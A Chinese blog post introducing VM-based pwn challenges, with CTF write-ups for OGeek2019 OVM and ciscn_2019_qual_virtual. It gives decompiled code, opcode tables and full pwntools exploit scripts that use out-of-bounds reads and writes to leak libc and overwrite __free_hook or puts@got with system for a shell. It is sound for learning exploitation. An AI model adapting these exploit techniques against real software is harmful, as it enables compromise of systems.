VMPWN入门

最新推荐文章于 2023-08-06 21:43:46 发布
最新推荐文章于 2023-08-06 21:43:46 发布
阅读量685 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Stella_Leo/article/details/119913195
版权

vmpwn

当作一个vmpwn的入门了,一些设计基础先不谈了,直接来干货。

vmpwn常见设计

  • 初始化分配模拟寄存器空间
  • 初始化模拟栈空间
  • 初始化分配模拟数据存储(buffer)空间 (data段)
  • 初始化伪OPCODE空间 (text段)

常见流程

  • 输入opcode
  • 有一个分析器,循环分解我们输入的opcode来翻译出汇编指令,多为出入栈和调用寄存器

一般漏洞都在越界写和越界读之类的。

例题

[OGeek2019 Final]OVM

main函数分析之后如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned __int16 code_size; // [rsp+2h] [rbp-Eh] BYREF
  unsigned __int16 _bp; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int16 S_P; // [rsp+6h] [rbp-Ah] BYREF
  unsigned int opration; // [rsp+8h] [rbp-8h]
  int i; // [rsp+Ch] [rbp-4h]

  comment = malloc(0x8CuLL);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  signal(2, signal_handler);
  write(1, "WELCOME TO OVM PWN\n", 0x16uLL);
  write(1, "PC: ", 4uLL);
  _isoc99_scanf("%hd", &_bp);                   // pc
  getchar();
  write(1, "SP: ", 4uLL);
  _isoc99_scanf("%hd", &S_P);                   // sp
  getchar();
  reg[13] = S_P;                                // 寄存器初始化、
  reg[15] = _bp;
  write(1, "CODE SIZE: ", 0xBuLL);
  _isoc99_scanf("%hd", &code_size);             // opcode的大小
  getchar();
  if ( S_P + code_size > 0x10000 || !code_size )
  {
    write(1, "EXCEPTION\n", 0xAuLL);
    exit(155);
  }
  write(1, "CODE: ", 6uLL);
  running = 1;
  for ( i = 0; code_size > i; ++i )
  {
    _isoc99_scanf("%d", &memory[_bp + i]);
    if ( (memory[i + _bp] & 0xFF000000) == 0xFF000000 )
      memory[i + _bp] = 0xE0000000;
    getchar();
  }
  while ( running )
  {
    opration = fetch();                         // reg15+1
                                                // return memory[reg15]
                                                // 实际上意思就是从bp开始循环拿指令翻译
    execute(opration);                          // 最高字节是opcode
                                                // 第二个字节是answer的index
                                                // 第三个字节是op2
                                                // 第四个是op1
                                                // 从左往右
  }
  write(1, "HOW DO YOU FEEL AT OVM?\n", 0x1BuLL);
  read(0, comment, 0x8CuLL);
  sendcomment(comment);
  write(1, "Bye\n", 4uLL);
  return 0;
}

然后一开始会初始化一个comment,然后最后的时候free掉、

接下来就是分析指令

0x10: reg[byte2] = low a1 #相当于给立即数
0x20: reg[byte2] = 0  #清0
0x30: reg[byte2] = memory[reg[byte4]] #读数
0x40: memory[reg[byte4]] = reg[byte2] 
0x50: #push reg[byte2]
0x60: sp-- reg[byte2] = stack[sp] #pop并且pop后栈顶
0x70: reg[byte2] = reg[byte4] + reg[byte3]
0x80: reg[byte2] = reg[byte3] - reg[byte4]
0x90: reg[byte2] = reg[byte4] & reg[byte3]
0xA0: reg[byte2] = reg[byte4] | reg[byte3]
0xB0: reg[byte2] = reg[byte4] ^ reg[byte3]
0xC0: reg[byte2] = reg[byte3] << reg[byte4]
0xD0: reg[byte2] = reg[byte3] >> reg[byte4]
0xE0: exit

读写两个地方没有验证范围,应该可以越界

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TSPaP2pU-1629877963995)(https://i.bmp.ovh/imgs/2021/08/d14a51e791eb158f.png)]

但是index在0-15以内,后来又看了一下,发现被局限了思维,也被混淆了视线。。。这个越界写的index是以寄存器的值为index,所以很容易造成越界写。

我们的思路是通过偏移打出free_hook-0x8的位置,然后越界写到comment的位置,这样chunk就指向了hook-0x8,然后写入/bin/sh\x00 + system就可以了

但是这个偏移,干了一个多消失就是没看出来怎么计算的。。。

后来发现是libc用错了,。。。所以偏移一直不对。

pwndbg> p &__free_hook
$1 = (<data variable, no debug info> *) 0x7fe75e2567a8 <__free_hook>
pwndbg> p &stdin
$2 = (<data variable, no debug info> *) 0x7fe75e255710 <stdin>
pwndbg> distance 0x7fe75e255710 0x7fe75e2567a8
0x7fe75e255710->0x7fe75e2567a8 is 0x1098 bytes (0x213 words)

然后利用系统最后打印reg的函数泄露出hook地址,然后打出system,最后就可以往里面写。

所以exp如下

from pwn import *

local = 1

binary = "./vmpwn"
libc_path = '/home/moqizou/mine/pwns/libcs/libc-2.23.so'
port = "28795"

if local == 1:
    p = process(binary)
else:
    p = remote("node4.buuoj.cn",port)

def dbg():
    context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']

'''
0x10 : reg[num1] = target lowest

0x20 : reg[num1] = target == 0

0x30 : (mov reg,memory) reg[num1] = memory[reg[num3]]

0x40 : (mov memory,reg) memory[reg[num3]] = reg[num1]

0x50 : (push) stack[(signed int)op] = reg[num1]

0x60 : (pop)  reg[num1] = stack[reg[13]]

0x70 : (add) reg[num1] = reg[num3] + reg[num2]

0x80 : (sub) reg[num1] = reg[num2] - reg[num3]

0x90 : (and) reg[num1] = reg[num3] & reg[num2]

0xA0 : (or)  reg[num1] = reg[num3] | reg[num2]

0xB0 : (xor) reg[num1] = reg[num3] ^ reg[num2]

0xC0 : (<<)  reg[num1] = reg[num2] << reg[num3]

0xD0 : (>>)  reg[num1] = reg[num2] >> reg[num3]

0xFF : (exit or print) if(reg[13] != 0) print oper
'''

# 0x10 : reg[num1] = target lowest
def set_number(n1,n3):
    return u32((p8(0x10) + p8(n1) + p8(0) + p8(n3))[::-1])

# 0x30 : (mov reg,memory) reg[num1] = memory[reg[num3]]
def read(n1,n3):
    return u32((p8(0x30) + p8(n1) + p8(0) + p8(n3))[::-1])

# 0x40 : (mov memory,reg) memory[reg[num3]] = reg[num1]
def write(n1,n3):
    return u32((p8(0x40) + p8(n1) + p8(0) + p8(n3))[::-1])

# 0xC0 : (<<)  reg[num1] = reg[num2] << reg[num3]
def left(n1,n2,n3):
    return u32((p8(0xc0) + p8(n1) + p8(n2) + p8(n3))[::-1])

# 0xD0 : (>>)  reg[num1] = reg[num2] >> reg[num3]
def right(n1,n2,n3):
    return u32((p8(0xd0) + p8(n1) + p8(n2) + p8(n3))[::-1])

# 0x70 : (add) reg[num1] = reg[num3] + reg[num2]
def add(n1,n2,n3):
    return u32((p8(0x70) + p8(n1) + p8(n2) + p8(n3))[::-1])

# 0x80 : (sub) reg[num1] = reg[num2] - reg[num3]
def sub(n1,n2,n3):
    return u32((p8(0x80) + p8(n1) + p8(n2) + p8(n3))[::-1])

# 0x90 : (and) reg[num1] = reg[num3] & reg[num2]
def And(n1,n2,n3):
    return u32((p8(0x90) + p8(n1) + p8(n2) + p8(n3))[::-1])

# 0xA0 : (or)  reg[num1] = reg[num3] | reg[num2]
def Or(n1,n2,n3):
    return u32((p8(0xa0) + p8(n1) + p8(n2) + p8(n3))[::-1])

# 0xB0 : (xor) reg[num1] = reg[num3] ^ reg[num2]
def Xor(n1,n2,n3):
    return u32((p8(0xb0) + p8(n1) + p8(n2) + p8(n3))[::-1])

def leak_libc(addr):
    global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_
    libc = ELF(libc_path)
    libc_base = addr - libc.sym['__free_hook']
    print "[*] libc base:",hex(libc_base)
    __malloc_hook = libc_base + libc.sym['__malloc_hook']
    system = libc_base + libc.sym['system']
    binsh_addr = libc_base + libc.search('/bin/sh').next()
    __free_hook = libc_base + libc.sym['__free_hook']
    _IO_2_1_stdout_ = libc_base + libc.sym['_IO_2_1_stdout_']

memory = 0x202060
reg = 0x242060
stack = 0x2420A0
comment = 0x202040
stdin = memory - 0xe0
offset = -56  # 0xffffffC8

# reg[num3] = -56 = 0xffffffC8
set_number(3,0xff)
set_number(0,0x8)
left(3,3,0) # 0xff00
set_number(2,0xff)
add(3,3,2)  # 0xffff
left(3,3,0) # 0xffff00
add(3,3,2)  # 0xffffff
left(3,3,0) # 0xffffff00
set_number(2,0xc8)
add(3,3,2)# 0xffffffc8


read(0,3)   # reg[0] = memory[reg[3]] = memory[-56]
set_number(2,1)
add(3,3,2)
read(1,3) #取的是目标的高字节

offset_free_hook_stdin = 0x1090

set_number(5,0x10)
set_number(6,0x8)
left(5,5,6)     # reg[5] = 0x1000
set_number(6,0x90)
add(5,5,6)# reg[5] = 0x1090
add(0,0,5)# reg[0] = memory[-56] + reg[5] -> reg[0]=free_hook-0x8

set_number(6,47)
add(3,3,6)
write(0,3)
#把free_hook写到了comment 这里写的是低字节
set_number(6,1)
add(3,3,6)
write(1,3)
#写高字节
#两个寄存器凑一个free_hook的地址

code = [
set_number(3,0xff),
set_number(0,0x8),
left(3,3,0),
set_number(2,0xff),
add(3,3,2),
left(3,3,0),
add(3,3,2),
left(3,3,0),
set_number(2,0xc8),
add(3,3,2),
read(0,3),
set_number(2,1),
add(3,3,2),
read(1,3),
set_number(5,0x10),
set_number(6,0x8),
left(5,5,6),
set_number(6,0x90),
add(5,5,6),
add(0,0,5),
set_number(6,47),
add(3,3,6),
write(0,3),
set_number(6,1),
add(3,3,6),
write(1,3),
u32((p8(0xff)+p8(0)+p8(0)+p8(0))[::-1])
]

p.sendlineafter('PCPC: ',str(0))
p.sendlineafter('SP: ',str(1))
p.sendlineafter('CODE SIZE: ',str(len(code)))
p.recvuntil('CODE: ')

#gdb.attach(p)

for i in code:
    p.sendline(str(i))

p.recvuntil("R0: ")
low_4 = int(p.recv(8),16)
p.recvuntil("R1: ")
high_2 = int(p.recv(4),16)

temp = high_2 << 32
leak = temp + low_4 + 8
log.success("LEAK:{}".format(hex(leak)))
leak_libc(leak)

# dbg()

payload = "/bin/sh\x00" + p64(system)
p.send(payload)


p.interactive()
ciscn_2019_qual_virtual

全流程有点复杂,先看指令

0x11 push
0x12 pop
0x21 add
0x22 sub
0x23 mul
0x24 div
0x31 load
0x32 save
0xff else

然后大致分析下函数。

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char *s; // [rsp+18h] [rbp-28h]
  void **stack_buffer; // [rsp+20h] [rbp-20h]
  void **op_buffer; // [rsp+28h] [rbp-18h]
  void **data; // [rsp+30h] [rbp-10h]
  char *ptr; // [rsp+38h] [rbp-8h]

  set_init(a1, a2, a3);
  s = (char *)malloc(0x20uLL);
  stack_buffer = (void **)Malloc(64);
  op_buffer = (void **)Malloc(128);
  data = (void **)Malloc(64);
  ptr = (char *)malloc(0x400uLL);
  puts("Your program name:");
  Scanf(s, 32LL);
  puts("Your instruction:");
  Scanf(ptr, 1024LL);
  transelate(op_buffer, ptr);
  puts("Your stack data:");
  Scanf(ptr, 1024LL);
  get_data((__int64)stack_buffer, ptr);
  if ( (unsigned int)sub_401967((__int64)op_buffer, (__int64)stack_buffer, (__int64)data) )
  {
    puts("-------");
    puts(s);
    print((__int64)stack_buffer);
    puts("-------");
  }
  else
  {
    puts("Your Program Crash :)");
  }
  free(ptr);
  Free(op_buffer);
  Free(stack_buffer);
  Free(data);
  return 0LL;
}

main函数大概是先读取一个name然后读取指令,数据,这两次读入都有一个ptr作为缓冲区。最后进入一个指令解析函数

__int64 __fastcall sub_401967(__int64 op_buffer, __int64 s_buffer, __int64 data)
{
  unsigned int v5; // [rsp+24h] [rbp-Ch]
  __int64 opration; // [rsp+28h] [rbp-8h] BYREF

  v5 = 1;
  while ( v5 && (unsigned int)get_op(op_buffer, &opration) )
  {
    switch ( opration )
    {
      case 0x11LL:
        v5 = push(data, s_buffer);              // 从buffer里面取值,存入data
        break;
      case 0x12LL:
        v5 = pop(data, s_buffer);               // data里面取东西给buffer
        break;
      case 0x21LL:
        v5 = add(data);                         // 取出data的两个值,相加存入data
        break;
      case 0x22LL:
        v5 = sub(data);                         // 取出的第一个数-第二个数,答案存入data
        break;
      case 0x23LL:
        v5 = mul(data);                         // 乘法
        break;
      case 0x24LL:
        v5 = div(data);                         // div
        break;
      case 0x31LL:
        v5 = load(data);                        // 读取data第一个数字偏移的内容,任意地址泄露
        break;
      case 0x32LL:
        v5 = save(data);                        // 任意地址写,第二个数字是写入的数据
        break;
      default:
        v5 = 0;
        break;
    }
  }
  return v5;
}

大概如上首先读取操作,然后就去执行。

这里利用的是loadsave函数,这两个函数能够构造出任意地址写和任意地址读。

load

__int64 __fastcall load(__int64 data)
{
  __int64 result; // rax
  __int64 v2; // [rsp+10h] [rbp-10h] BYREF

  if ( (unsigned int)get_op(data, &v2) )
    result = cpy(data, *(_QWORD *)(*(_QWORD *)data + 8 * (*(int *)(data + 12) + v2)));
  else
    result = 0LL;
  return result;
}

save

__int64 __fastcall save(__int64 a1){  __int64 v2; // [rsp+10h] [rbp-10h] BYREF  __int64 v3; // [rsp+18h] [rbp-8h] BYREF  if ( !(unsigned int)get_op(a1, &v2) || !(unsigned int)get_op(a1, &v3) )    return 0LL;  *(_QWORD *)(8 * (*(int *)(a1 + 12) + v2) + *(_QWORD *)a1) = v3;  return 1LL;}

题解

思路的话

    Arch:     amd64-64-little    RELRO:    Partial RELRO    Stack:    Canary found    NX:       NX enabled    PIE:      No PIE (0x400000)

所以目标是劫持puts的got表地址,因为最后有个puts(s)如果s为/bin/sh\x00的话,就可以直接拿到shell了。

但是实现上还是有点绕,主要问题还是在load和save两个函数的理解上,这两个函数,理解点关键在于

*(*(a1+12)+v2) + *a1这句话,前面那个*(a1+12)是数目,加上我们算上的偏移,后面那个*a1是堆地址,也是地址,每次对数据段的操作都是对这个地址的操作。所以目前的思路有两种

  • 第一

改掉基地址,然后在这个基础上去劫持puts的got表

  • 第二

直接按照堆地址的偏移改掉got表

修改got表,主要是依靠load函数和save函数

第二种的话可以先load,把puts的got表都存入data里面,然后push一次system的offset,接着add,得到system的地址,然后push计算出来的偏移,save覆写got就可以了

第一种,可以先push addr push offset save这样改掉基地址,然后load puts@got 然后push offset add 就得到了system,最后push puts的offset 再去save

exp

#第2种方法from pwn import *#p = process('./ciscn_2019_qual_virtual')p = remote("node4.buuoj.cn","29921")p.recvuntil("name:")p.sendline("/bin/sh\x00")p.recvuntil("instruction:")#payload = "push push save"#payload += "push load"payload = "push push save "payload += "push load "#指令之间要空格payload += "push add push save"p.sendline(payload)str1 = ''str1 += str(0x404088) + " "str1 += "-3" + " "str1 += "-12" + " "offset = -0x2a300print hex(offset)str1 += str(offset) + " -12"p.recvuntil("data:")p.sendline(str1)p.interactive()

偏移就拿libc里面的便宜就可以了,但是我这里没打通,我也不知道为啥。。

好吧。。指令之间要空格,我忘记了。。。

总结

太麻烦了。。。。要分析好久,不写了

16385
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VM pwn入门
weixin_44145820的博客
06-07 2072
VM pwn貌似是最近火起来的一类PWN题。最近打的好几场比赛都出现了VM pwn的题目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn题,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn题。本文就主要对这两道题目进行分析。 [OGeek2019 Final]OVM 程序分析 作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数 本题使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,
vm-pwn入门
蚁景网安学院
09-21 646
亲爱的,关注我吧9/21文章共计2761个词预计阅读7分钟来和我一起阅读吧引言之前一直没去了解过vm-pwn,做一些题目对vm-pwn进行一个大体上的了解,算是入门。前置知识对指令有过了...
VMPWN
Amalllの博客
11-11 1037
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。 2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化 3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环
【八芒星计划】 VM PWN
carol2358的博客
09-01 487
这篇用来记录VM PWN 先申明本篇文章资料来源: https://blog.csdn.net/weixin_44145820/article/details/106600382 https://www.anquanke.com/post/id/208450#h2-1 https://xz.aliyun.com/t/6865 文章目录[OGeek2019 Final]OVM vm pwn最关键的就是逆向相关程序,理解每个指令的作用,漏洞大多数都是数组越界 先介绍一些基础的概念: 1.虚拟机保护技术 所谓
V&NCTF 2021 hh (vmpwn)
qq_51868336的博客
03-17 530
vm 这道题就是弄了一个vm,然后根据输入的code, 执行相应的操作 我的理解是 相当于在函数栈里伪造一个虚拟栈,又伪造了栈顶指针,然后在这个虚拟栈里你可以进行一些操作,如add(将栈顶两个元素相加),push,pop等,然后有时候由于检验不当,就会造成越界,导致原本操作只是在虚拟栈里变成了可以影响实际函数栈的数据,相当于可以劫持RBP,RET,如果能做到这一步,接下来就是常规的ROP了 这是add指令,stack[r_sp+1000]就相当于栈顶 push指令更好理解 注意到下面这两处 这两个指令
一道题目入门VMpwn
qq_40712959的博客
04-16 331
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
Antctf-vmpwn
03-15
Antctf-real_vmpwn写 该主题通过对vmware dhcp组件进行了神奇的修改,介绍了旧版本中的cve-2020-3947 UAF漏洞和静默固定变量未初始化的漏洞。 此漏洞组合可能导致较低版本(<15.1.2)的实际转义,因此将该漏洞...
[OGeek2019 Final]OVM——详细入门VM pwn
最新发布
fzucaicai的博客
08-06 969
仔细分析代码都可以发现,这些操作都没有对数组的下标进行检查,这样会导致什么后果呢,举个例子,如果有一个重要数据B存在数组array[10]的内存前面,如果不对数组的下标进行检查的话,那么我就可以构造array[-1]并输出,就可以得到B的内容了。也就是说,我们给程序输入一串指令,这个程序会有自己独特的,对代码的理解,并进行像分解成机器码那样,执行,而像寄存器,栈空间,存储空间都是程序自己设计的,而不是系统分配的。这两个条件判断语句的目的是确保在进行内存释放操作之前,所提供的指针和大小都是有效的。
vmpwn一&高校战役Easyvm复现
qq_39948058的博客
08-27 284
高校战役Easyvm 前言:本人tcl,刚接触vm不久,这个看了别人的wp感觉难度还可以,决定自己复现一下大佬勿喷哈 此题思路:就是依靠任意地址写来打freehook,然后再一把唆onegadget可以system也可以!! int __cdecl main(int argc, const char argv, const char **envp) { void *buf; // ST2C_4 _DWORD *ptr; // [esp+18h] [ebp-18h] int v5; // [esp+AC
VMPWN入门系列-2
蚁景网安学院
07-28 285
温馨提示:文章有点长,图片比较多,请耐心阅读实验四 VMPWN4题目简介这道题应该算是虚拟机保护的一个变种,是一个解释器类型的程序,何为解释器?解释器是一种计算机程序,用于解释和执行源代码。解释器可以理解源代码中的语法和语义,并将其转换为计算机可以执行的机器语言。与编译器不同,解释器不会将源代码转换为机器语言,而是直接执行源代码。即,这个程序接收一定的解释器语言,然后按照一定的规则对其进行解析,完...
pwn-seccon2018-kindvm
sunrise的博客
10-30 304
漏洞:整数溢出 虚拟指令集分析: nop指令: 0x00 nop load指令: 0x01 + 寄存器号(0-6)+ 内存地址(2字节,小于0x3fc)这个偏移考虑负值,例如设置为0xfff0,读取时是uint类型,计算偏移却是int store指令: ...
VMPWN入门系列-1
YJ_12340的博客
07-27 1019
这是一道基础的VM相关题目,VMPWN入门级别题目。前面提到VMPWN一般都是接收字节码然后对字节码进行解析,但是这道题目不接受字节码,它接收字节码的更高一级语言:汇编。程序直接接收类似”mov”、”add”之类的指令,可以把这道题目看作是一个执行汇编语言的处理器,相比于解析字节码的VM,逆向难度要大大减小。非常适合入门
CTF pwn题之虚拟机题型详解
lifanxin的博客
05-24 1500
虚拟机题型详解概述如何分析一个例子总结 概述   随着对pwn题的学习,慢慢开始接触VM虚拟机的pwn题了,刚开始做这种类型的题时会发现代码量比较大,略显复杂,复杂的部分主要是在用程序实现虚拟机指令那里。   其实这种题做法和普通pwn类似,也是寻找漏洞,复杂的地方在于需要我们去分析出虚拟机实现的指令,然后用这些指令操作进行漏洞利用。 如何分析   接下来介绍下如何分析,对于VM类型的pwn题,复杂的地方在于分析出该VM对应实现的指令,那么如何分析需要一定章法。这里需要简单知晓一些计算机组成原理和汇编语言的
[OGeek2019 Final]OVM
z1r0的博客
04-10 307
[OGeek2019 Final]OVM 笔者写在了自己的blog上 https://www.z1r0.top/2022/04/09/vm-pwn%E5%AD%A6%E4%B9%A0/
OGeek_2019_Final OVM题解
lifanxin的博客
05-24 764
WP程序分析程序主逻辑分析虚拟机指令分析利用思路exp总结 程序分析   本题目是一道典型的虚拟机题目,通过这道题目,我们可以学习一下VM pwn题的分析技巧和利用思路。   该题目程序和远程环境可以在buuoj上找到,下面老规矩先检查下程序信息,64位小端程序,没有开启栈保护。   做虚拟机的pwn题,我们可以分两大步骤进行,首先先分析一下这个程序是如何实现虚拟机功能的,也就是程序自身的大逻辑,然后我们再详细分析程序虚拟出来的指令,分析指令的过程可能会比较耗时,需要耐心。 程序主逻辑分析   我们首先来
[pwn]VMpwn:2020网鼎杯青龙组pwn boom2 wp
热门推荐
Breeze的博客
05-12 1万+
2020网鼎杯青龙组pwn boom2 wp 比赛的时候被特斯拉那道隐写恶心到了,导致一直在肝那道题,也没看pwn,赛后看了组内大佬的wp,感觉这道pwn也不是很难,于是自己又做了一遍。这道题总共80+队伍做出来,反而更难的pwn1 boom1却有200+队伍做出来,不得不说py真的很严重,赛后我看群里说比赛的时候好像有一份pwn1的exp在全网流通,有点小恶,但也无所谓,名词不重要,自己学到东西才是最重要的。 题目分析 首先检查一下安全策略: 安全策略全开,然后简单看一下逻辑: 执行之后让你输入co
VMPWN入门级别题目详解(一)
蚁景网安学院
07-26 1191
这是一道基础的VM相关题目,VMPWN入门级别题目。前面提到VMPWN一般都是接收字节码然后对字节码进行解析,但是这道题目不接受字节码,它接收字节码的更高一级语言:汇编。程序直接接收类似”mov”、”add”之类的指令,可以把这道题目看作是一个执行汇编语言的处理器,相比于解析字节码的VM,逆向难度要大大减小。非常适合入门
Pwn的虚拟机
qq_43553690的博客
08-09 1679
Pwn的虚拟机 刚刚接触到Pwn这个方向,学习教程上面的各种命令和操作。 但是,没有视频中那些工具,学习的效率会降低。 最好,教学视频上的每一个指令都直接亲手打一遍。 去理解每个知识点的意思。 然后放上来一个做pwn题的虚拟机,方便新手去学习。 这个虚拟机文件导出格式为ovf格式。 点击红色方框来打开。 然后等待一会就可以了。 我的用户名是:isidro 密码是:toor root的...
pwn专用虚拟机的简单工具配置
ACdream
08-02 3699
pwn选手的基本配置信息
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值